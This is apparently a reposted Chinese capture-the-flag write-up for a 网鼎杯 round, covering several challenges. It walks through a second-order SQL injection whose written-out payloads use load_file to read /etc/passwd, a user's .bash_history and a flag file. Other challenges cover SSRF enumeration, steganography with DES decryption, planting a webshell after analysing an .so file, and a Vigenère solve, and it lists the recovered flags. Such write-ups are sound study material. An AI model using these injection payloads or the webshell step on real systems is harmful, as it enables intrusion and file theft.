网鼎杯第四场,完全被虐着打,根本就打不过,
原文地址:https://www.o2oxy.cn/1817.html
爆破得到账号密码 zhangwei zhangwei666
同时发现git 泄露 get 源代码。发现write_do.php 中很一个很有意思的地方
然后发现可以构成二次注入:
思路是这样的
1、 观察了一下发现是两张表 board 、comment
首先写评论的时候数据写到board 然后再次评论的时候 category这个变量会从 board
表中读取然后构成二次注入
如下图:
也就是说comment 中的category 字段是直接取 board字段。构造成二次注入。
比如说在board 表中写入一段
如下:
‘, content=user(),/* 然后 评论的时候 只需要闭合这个就OK
‘, content=user(),/**/# 就可以查询到当前的user
那么测试吧=。=
首先读取一下passwd
‘,content=(select load_file(‘//etc/passwd’)),/*
触发的话只需在评论中评论*/# 如下:
发现一个www用户 看看用户的命令记录
‘,content=(select load_file(‘//home/www/.bash_history’)),/*
执行了如下:
cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start
那么查询.DS_Store 是什么东西
‘,content=(select hex(load_file(‘//tmp/html/.DS_Store’))),/*
得到hex
解密一下
http://www.ab126.com/goju/1711.html
得到如下:
读取一下flag
‘,content=(select hex(load_file(‘//var/www/html/flag_8946e1ff1ee3e40f.php’))),/*
得到如下:
flag{cf275fbb-4435-4d5b-a229-4207e425649e}
是一个wp 的程序。看到第二篇博客发现有一个很意思的ssrf 各种尝试之后呢。在github 搜索关键词找到了相关的信息
真的是很皮啊
访问http://xxx/WD_UserListAPI.php 存在 之后列举出UID 得到正确结果为233 得到flag
这是一个送分题
首先是分离出来一个png 得到一个key:ctfer2333
分离gif 得到576张图片。一开始以为是二维码,然后一直捣鼓二维码。最后朋友提示说是二进制的格式
图片上的绿色为0 紫色为1 转换 。 尝试了绿色为1 和紫色为0 发现 绿色为0 紫色为1 可以转换
用python 解开之后是一大串的二进制
得到o8DlxK+H8wsiXe/ERFpAMaBPiIcj1sHyGOMmQDkK+uXsVZgre5DSXw==hhhhhhhhhhhhhhhh
各种尝试无果之后去掉 后面hhhhhhhhhh 可能是那个加密的key (可能是最开始解密出来的png图片的意思,并不是说是ctfer23333,请勿错误理解)
然后进行des解密如下:
flag{2ce3b416457d4380dc9a6149858f71db}
扫描发现备份文件中有一个www.zip 一个so 文件一个php 文件
上传一个php文件发现是一个phpinfo 好无奈啊
然后就一脸懵逼
尝试分析一波So文件 发现
首先是一个zlib 的压缩,MD5验证 。最后使用了异或0xc
写了 一个蹩脚的脚本
使用winhex 构造新的文件、分为四个部分
1、密文的md5值
3、密文长度十六进制、补齐长度
4.密文
菜刀上去
这个看起来就像是维尼亚密码
因为不晓得密码。所以一直很纠结,密码是什么,然后猜呗、
看看i春秋 是不 密码
然后用这个然后看题目上海。然后又有点迷糊
最后没办法。只能一个个尝试,无意中想到啊icq + 维尼亚
icqvigenere
神奇的是竟然解密成功 我靠。神仙啊。
**上面这些都是娱乐一下。密码是队友发给我的。=。= **
=。= 破解网址
https://guballa.de/vigenere-solver
。。。破解出来就是这个密码 。flag 直接ctrl+F 查询一下就OK
希望师傅们不要怼这个=。= 真没啥怼的。凭空想的flag 的剧情明天可能就上演了
icqvigenere
发现flag
flag{vigenereisveryeasyhuh}